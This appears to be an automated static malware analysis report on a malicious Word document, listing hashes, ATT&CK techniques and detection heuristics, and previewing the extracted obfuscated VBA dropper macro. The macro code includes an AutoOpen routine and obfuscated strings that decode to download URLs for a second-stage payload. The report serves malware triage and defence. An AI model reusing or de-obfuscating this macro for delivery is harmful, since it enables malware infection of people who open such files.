Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2c3d9588d19f08ae…

MALICIOUS

Office (OLE)

Size: 169.0 KB
Created: 2018-05-18 10:29:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: 44fbaf953ebe42700c13b66e3d1c7412
SHA-1: 624a9d77e3a57ab35ec16aa27c991fe4a8210d5e
SHA-256: 2c3d9588d19f08aee19a872f311fbcc631a5f62e95133bc81810b6b7be97ebd5
Risk Score: 204

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro calls Shell() and de-obfuscates a URL at runtime, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6548145-0' further supports its dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6548113-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6548113-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • URL de-obfuscated from VBA string literal (1 URL) [info] OLE_VBA_OBFUSCATED_URL
    A VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime: junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
      • http://kbOk+bOkshel.bOk+bOkorbOk+bOkg/wp3bOjY.UtqQ (referenced by macro)
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 165725 bytes
SHA-256: 7ccd5752d3a72675d8d9f71b4e386e8737a7cba9b30de153f24dd7074931fb1e

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "imAjbuPcfSfh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub oLpAIK(poJVJ)
For BPiwX = 18775 To 55147
      For nZsjjw = 92215 To MhVHW
         ZPiOus = ChrB(qwTwN)
      Next
      QPKjQp = 22345 * 771
      wUYMLU = czBzEp + RJPkQ
Next
End Sub
Sub cZhVCf(BzESK)
For nTKpih = 87048 To 29309
      For TwQrb = 876 To aBEvDJ
         mCKfO = ChrB(ivimI)
      Next
      vHUjD = 44038 * 64626
      FlFKD = JXCNO + dwXmYB
Next
For ppYNdj = 48827 To 9132
      For FUBYVB = 34568 To zzcJQ
         sUXQY = ChrB(jhIBss)
      Next
      jXbbi = 366 * 47136
      iMqWb = WpYZUZ + fsFSAF
Next
For YLAjd = 67295 To 71457
      For VYzJro = 19750 To htzVN
         kcXTjA = ChrB(VIduXt)
      Next
      LKsst = 87132 * 38081
      bLhuVj = ZDjnj + XIKzkw
Next
End Sub
Sub QUOUvn(XAEcUY)
For BMlpfv = 95478 To 66749
      For KkMvoB = 65488 To IvUjHw
         whmBZ = ChrB(HTIpWw)
      Next
      KECBh = 88038 * 6958
      jrIVSL = YDCuP + qzIwJ
Next
For DQDGSE = 17581 To 66882
      For sSBNt = 55458 To qifGn
         uEnbhz = ChrB(HuFXS)
      Next
      TflqR = 17983 * 54842
      jlAhW = aHdRDn + WzSqX
Next
End Sub
Sub Autoopen()
On Error Resume Next
For OwzMd = 90142 To 86005
      For kEoNz = 21477 To NSnuL
         sAQnU = ChrB(lzjSzu)
      Next
      NTiYW = 73476 * 56799
      qCpEFc = IjfvMF + vhZIQ
Next
HVnXMnsXU (MEmpT + WBFjPWH + zFiuQI)
For RCwbjP = 4240 To 91806
      For zmDiur = 44594 To zNWWa
         PAkIij = ChrB(mOnioT)
      Next
      FptNLX = 8059 * 99357
      lCFicu = mLqPi + zGXLLN
Next
End Sub
Sub PDGXZ(KTIKDi)
For OzGZB = 1221 To 83722
      For BTzEP = 58199 To nqzLqb
         hviJj = ChrB(jiAnhS)
      Next
      zzwKK = 43020 * 23745
      kJTKS = fRLrs + sRLrrU
Next
For bWTKX = 94325 To 33160
      For nsoATP = 13816 To lOwOQE
         ovodU = ChrB(oHSqPk)
      Next
      RzwNAd = 84628 * 47676
      rYYlU = ctFqX + iPiTw
Next
For zlWJE = 59066 To 29481
      For mRlNmM = 77133 To EQEjO
         iZkYN = ChrB(mjOuEV)
      Next
      nAhTuV = 76312 * 74411
      HsDLV = LRONu + GwYjRh
Next
End Sub
Sub CDrJRT(SWzKN)
For cTSsUB = 23133 To 51616
      For wfqaH = 62198 To Imcou
         GPimrV = ChrB(oUDzTI)
      Next
      ijMPVS = 57829 * 12969
      SqLUO = KiYjs + CJiJq
Next
End Sub

Attribute VB_Name = "kccrHztZcaMT"
Sub FAEQvj(fZJVa)
For QacWiG = 58543 To 72713
      For djbjMb = 79250 To kVFFmM
         tndqBK = ChrB(HQTiT)
      Next
      FwGopM = 42874 * 39991
      LTZqnZ = UidNdd + cokiKc
Next
End Sub
Function WBFjPWH()
On Error Resume Next
For PdHsj = 77455 To 27996
      For PaqdD = 53432 To QLXuH
         lFGTcE = ChrB(AFdLsi)
      Next
      pRwGkl = 6839 * 36135
      WAZPS = ZLQUP + YBYEjk
Next
For BPQFzf = 73499 To 50552
      For jShjv = 84227 To Orscf
         WzhRO = ChrB(lscZhw)
      Next
      JCwwKD = 15098 * 93446
      OzminL = HWjOfs + YfRro
Next
AwzUY = TXPWGS(",QqtU.YjOb3pw/gkOb+kObrokOb+kOb.lehskOb+kObk//:ptth@/Y37skOb+kObHem/mokOb+kO'+'bc.nosk'+'Ob+kObwkOb+kObalinikOb+kOb'+'g/kOb+kOb/kOb+kOb:ptthkOb+kOb@/K0FXK", 64014 + 2 - 64014, 64014 + 145 - 64014)
For HtAkT = 65353 To 36439
      For shYXa = 69097 To kfjHZE
         CAkzR = ChrB(aTtMTb)
      Next
      VzBLFt = 43838 * 29716
      IrEIjn = ikPQm + zAVQhq
Next
For zsVcLB = 82980 To 85682
      For ihbkX = 21857 To RsjLtd
         NjTQJ = ChrB(qBqTK)
      Next
      riLAiw = 70192 * 40755
      nZiolT = MGZCW + Iwrlh
Next
rsjNHtbWjCu = TXPWGS("w@9DNiI4Zy(kOb+kOb&kOb+kOb;)kOb+kObCDSNCkOb+kObV ,)(YfkkOb+kObgNlzkO9", 48277 + 2 - 48277, 48277 + 62 - 48277)
For VjrIau = 38330 To 14833
      For szNJI = 85304 To GobXiV
         ktHGVW = ChrB(IzQuz)
      Next
      vREuRL = 26984 * 38709
      MtOih = DJKHAr + PSnwk
Next
For HkKUh = 21079 To 21121
      Fo
... (truncated)